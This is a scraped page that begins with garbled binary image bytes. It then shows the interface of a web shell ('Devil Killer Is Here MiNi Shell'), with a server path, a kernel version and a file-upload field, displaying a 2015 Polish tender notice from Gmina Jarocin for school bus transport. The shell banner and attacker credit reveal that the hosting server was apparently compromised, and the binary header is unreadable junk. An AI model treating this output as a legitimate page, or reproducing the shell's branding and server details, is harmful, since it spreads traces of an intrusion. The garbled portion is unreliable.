JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150714/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150714/104571-N-2015.html

<p class="kh_header"><b>Jarocin: Dowóz uczniów do szkół podstawowych i gimnazjów na terenie Gminy Jarocin oraz dowóz do szkół i przedszkola uczniów pojazdem przystosowanym do przewozu osób niepełnosprawnych wraz z zapewnieniem opieki dla uczniów niepełnosprawnych</b><br>
<b>Numer ogłoszenia: 104571 - 2015; data zamieszczenia: 14.07.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Jarocin , Al. Niepodległości 10, 63-200 Jarocin, woj. wielkopolskie, tel. 62 7499500, faks 62 7472225.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.jarocin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dowóz uczniów do szkół podstawowych i gimnazjów na terenie Gminy Jarocin oraz dowóz do szkół i przedszkola uczniów pojazdem przystosowanym do przewozu osób niepełnosprawnych wraz z zapewnieniem opieki dla uczniów niepełnosprawnych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest:
1)	Dowóz uczniów do szkół podstawowych i gimnazjów na terenie Gminy Jarocin bez opieki przewoźnika tj. do Gimnazjum w Witaszycach,  Szkoły Podstawowej 
w Golinie, Szkoły Podstawowej w Mieszkowie, Zespołu Szkół w Cielczy.
2)	Dowóz uczniów niepełnosprawnych z zapewnieniem opieki przez przewoźnika 
do Zespołu Szkół nr 5 w Jarocinie, Przedszkola z oddziałami integracyjnymi 
na ul. Waryńskiego 5 w Jarocinie oraz Zespołu Szkół Specjalnych w Jarocinie.

2.	Dowóz uczniów do szkół na terenie Gminy Jarocin od dnia 01.09.2015r. 
do 24.06.2016 r. odbywać się będzie zgodnie z liniami tras, w następujący sposób:
1)	DOWÓZ UCZNIÓW:
a)	Dowóz uczniów do Gimnazjum w Witaszycach dla 8 uczniów:
-	1 dowóz: wyjazd z Jarocina, godz. 7.30 na trasie Witaszyczki przystanek przy lesie, Witaszyczki przystanek Lenwit, Witaszyce godz. 8.05. 
-	2 odwozy:  na godz. 13.50 i na godz. 14.45 - trasa Witaszyce, Witaszyczki przystanek przy lesie, Witaszyczki przystanek Lenwit, Jarocin, w dni pracy szkoły.  

b)	Dowóz uczniów do Szkoły Podstawowej w Golinie dla 19 uczniów:
-	1 dowóz: na trasie Jarocin, Siedlemin, Golina, Stefanów, Golina, Potarzyca, Golina na godz. 7.45,
-	1 odwóz: godz. 14.30 Golina, Potarzyca, Golina, Stefanów, Golina, Siedlemin,  Jarocin w dni pracy szkoły.

c)	Dowóz uczniów do Szkoły Podstawowej w Mieszkowie dla 50 uczniów:
-	1 dowóz:  godz. 7.50 na trasie Radlin (2 przystanki), Kąty (dwa przystanki), Radlin (trzy przystanki), Mieszków (dwa przystanki) 
na godz. 8.05,
-	2 odwozy:  godz. 13.00 i godz.14.45 - trasa Mieszków (dwa przystanki), Radlin(trzy przystanki), Kąty(dwa przystanki) w dni pracy szkoły.

d)	Dowóz  uczniów do Zespołu Szkół w Cielczy z Kątów, Radlina, Mieszkowa, Cząszczewa, Osieka dla 137 uczniów w dni pracy szkoły:
-	5  dowozów:  godziny odjazdu 7.10 ,7.30, 7.50, 8.30, 9.20 na trasach:
- Kąty, Radlin, Mieszków, Osiek, Cząszczew, na godz. 7.45,
- Cielcza (osada), Cielcza na godz. 7.40,
- Cząszczew, Osiek, Mieszków, Cielcza na godz. 8.05,
- Kąty, Radlin, Mieszków, Osiek, Cząszczew, Cielcza na godz. 9.10,
- Cząszczew, Osiek, Mieszków, Cielcza na godz. 09.50.
Trasy dowozu w ciągu tygodnia ulegają niewielkim zmianom. Szczegóły tras dostępne u Dyrektora Zespołu Szkół w Cielczy.    
-	5 odwozów z Zespołu Szkół w Cielczy: 
- Cielcza (osada), Cząszczew, Osiek, Mieszków, Radlin na godz.12.50,
- Cielcza, Cząszczew, Osiek, Mieszków na godz.13.45,
- Cielcza(osada), Cząszczew, Osiek, Mieszków, Radlin, Kąty na godz. 14.40,
- Cielcza, Cząszczew, Osiek, Mieszków, Radlin, Kąty na godz. 15.35,
- Cielcza, Cząszczew, Osiek, Mieszków, Radlin, Kąty na godz. 16.25.
Trasy odwozu w ciągu tygodnia ulegają niewielkim zmianom. Szczegóły tras  dostępne u Dyrektora Zespołu Szkół w Cielczy.    

Liczba dzienna obsługiwanych dowozów (dowóz uczniów) wynosi maksymalnie 490km.






2)	DOWÓZ UCZNIÓW NIEPEŁNOSPRAWNYCH:
a)	Dowóz uczniów do Zespołu Szkół nr 5 w Jarocinie: z Jarocina 20, Siedlemina 2, Goliny 2, Cielczy 1, Hilarowa 1, Witaszyc 2, Zakrzewa 1, 
Tarc 1, Kadziaka 1,  tj. 31 uczniów:
-	2 dowozy:  na godz. 7.45 pierwszy i na godz. 8.35 drugi, 
-	3 odwozy: o godz. 13.30, 14.30, 15.20, w dni pracy szkoły.  

b)	Dowóz dzieci do Przedszkola z oddziałami integracyjnymi na 
ul. Waryńskiego 5 w Jarocinie: z Jarocina 5, Cielczy 2, Goliny 1, Roszkowa 1, Mieszkowa 2, Zakrzewa 1, Witaszyc 2 tj. 14 dzieci:
-	2 dowozy:  pierwszy na godz. pomiędzy 7.00  - 8.00, drugi na godz. pomiędzy 12.00- 13.00,
-	 3 odwozy: pierwszy godz. pomiędzy 12.00 - 13.00, drugi pomiędzy 15.30-16.00, trzeci  16.00-17.00, w dni pracy przedszkola.

c)	Dowóz uczniów do Zespołu Szkół Specjalnych w Jarocinie 
z Witaszyc 9, Zakrzewa 6, Roszkówka 1, Wilczyńca 1, Bachorzewa 2, Hilarowa 3, Łuszczanowa 2, Annapola 1, Cielczy 8, Mieszkowa 1,  Wilkowyi 2, Ciświcy 1, Potarzycy 1,  Jarocina 26 - tj. 64 uczniów:
-	4 dowozy: na godz. 8.00,
-	6 dowozów na godz. 9.40 (3dowozy), 10.30 (2dowozy), 11.30 (1dowóz)
-	9 odwozów: na godz. 12.20 (2 odwozy), 14.00 (4 odwozy), 
15.35 (2 odwozy), 16:00 (1 odwóz)  w dni pracy szkoły. 

Liczba dzienna obsługiwanych dowozów (dowóz uczniów niepełnosprawnych)  wynosi  maksymalnie 450 km.  

3)	SZCZEGÓŁOWY PLAN DOWOZÓW uzgodniony będzie z dyrektorami placówek oświatowych przed rozpoczęciem roku szkolnego 2015/2016 i może ulec niewielkiej zmianie..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 60.13.00.00-8, 60.14.00.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 24.06.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca zobowiązany jest wykazać,  że posiada licencję lub inny dokument uprawniający do wykonywania usługi,  zgodnie z ustawą z dnia 6 września 2001r. o transporcie drogowym ( j.t. Dz. U. 2013, poz. 1414 ze zm.)</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca zobowiązany jest wykazać się doświadczeniem w wykonaniu 
a przypadku świadczeń okresowych lub ciągłych również wykonywanych 
w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, co najmniej:
-	jednej usługi, polegającej na dowozie uczniów do szkół podstawowych 
i gimnazjów o wartości 300.000,00 zł brutto,
-	jednej usługi, polegającej na dowozie uczniów niepełnosprawnych 
o wartości 200.000 zł brutto.
Warunek może być spełniony łącznie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca zobowiązany jest wykazać, że dysponuje lub będzie dysponował:
-	minimum 6 autobusami do przewozu uczniów ze szkół podstawowych 
i gimnazjów (31 miejsc siedzących i więcej, gdzie minimum 4 autobusy mieszczą się w normach emisyjności spalin na poziomie co najmniej 
Euro 4),
-	minimum 3 pojazdami przystosowanymi do przewozu osób niepełnosprawnych, gdzie minimum 1 pojazd mieści się w normach emisyjności spalin na poziomie co najmniej Euro 4)</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca zobowiązany jest wykazać, że dysponuje lub będzie dysponował:
-	minimum 4 osobami,  które posiadają kwalifikacje pedagogiczne lub mają ukończony kurs kierowników wycieczek szkolnych lub inny kurs dający kwalifikacje dla opiekunów dowozu dzieci, ważne badania lekarskie, aktualne przeszkolenie w zakresie BHP i ppoż., w zakresie udzielania pierwszej pomocy oraz co najmniej 6 miesięczny okres doświadczenia 
w opiece nad osobą niepełnosprawną, 
-	minimum 13 osobami posiadających kwalifikacje do kierowania pojazdami niezbędnymi do wykonania zamówienia (prawo jazdy kategoria D i kwalifikacje na przewóz osób i rzeczy),</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca zobowiązany jest posiadać ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia w wysokości min. 100 000,00 zł</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>Wykonawca zobowiązany jest wykazać się doświadczeniem w wykonaniu 
a przypadku świadczeń okresowych lub ciągłych również wykonywanych 
w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, co najmniej:
-	jednej usługi, polegającej na dowozie uczniów do szkół podstawowych 
i gimnazjów o wartości 300.000,00 zł brutto,
-	jednej usługi, polegającej na dowozie uczniów niepełnosprawnych 
o wartości 200.000 zł brutto.
Warunek może być spełniony łącznie.;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 97</li>
<li>2 - Czas podstawienia autobusu zastępczego - 3</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zgodnie z art. 144 ust. 1 ustawy Prawo zamówień publicznych (t. j. Dz. U. 2013, poz. 907 z późn. zm.) Zamawiający przewiduje zmiany postanowień zawartej umowy w stosunku do treści oferty w następujących przypadkach:
1)	dopuszczalna jest zmiana umowy polegająca na zmianie osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialne za świadczenie usług. Przewoźnik może zmienić te osoby na prośbę tych osób oraz z przyczyn niezależnych od nich, tj. zdarzeń losowych (śmierć, choroba, zaginięcie, zwolnienie) przy czym osoby zastępujące pierwotnie wskazane osoby w potencjale kadrowym będą musiały posiadać uprawnienia nie gorsze od nich,
2)	dopuszczalna jest zmiana umowy polegająca na zmianie osób z powodu niewywiązywania  się tych osób z należytego wykonywania przedmiotu zamówienia oraz wystąpienia innych przyczyn niezależnych od wykonawcy (np. rezygnacji osób wskazanych do realizacji usług), skutkujących koniecznością zmiany osób przewidzianych do realizacji zamówienia. Warunkiem dopuszczenia nowych osób do realizacji zamówienia w ramach niniejszej umowy jest akceptacja Zamawiającego,
3)	dopuszczalna jest zmiana umowy polegająca na zmianie wynagrodzenia za przedmiot zamówienia w przypadku gdy ulegną zmianie powszechnie obowiązujące przepisy w zakresie wysokości stawki podatku od towarów i usług na przedmiot świadczenia,
4)	dopuszczalna jest zmiana umowy polegająca na zmianie danych Przewoźnika bez zmian samego Przewoźnika (np. zmiana siedziby, adresu, nazwy),
5)	Zamawiający przewiduje możliwość zmiany terminu wykonania poszczególnych elementów przedmiotu umowy, jeżeli dochowanie terminu określonego w umowie jest niemożliwe z uwagi na siłę wyższą lub inne okoliczności niezależne od stron umowy lub których strony umowy przy zachowaniu należytej staranności nie były w stanie uniknąć 
i przewidzieć.
2. Wszelkie zmiany umowy wymagają formy pisemnej pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.jarocin.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Jarociński Fundusz Poręczeń Kredytowych Sp. z o.o., ul. T. Kościuszki 15B, 63-200 Jarocin.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.07.2015 godzina 10:00, miejsce: Urząd Miejski w Jarocinie - Sekretariat, pok. nr 32, Al. Niepodległości 10, 63-200 Jarocin.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com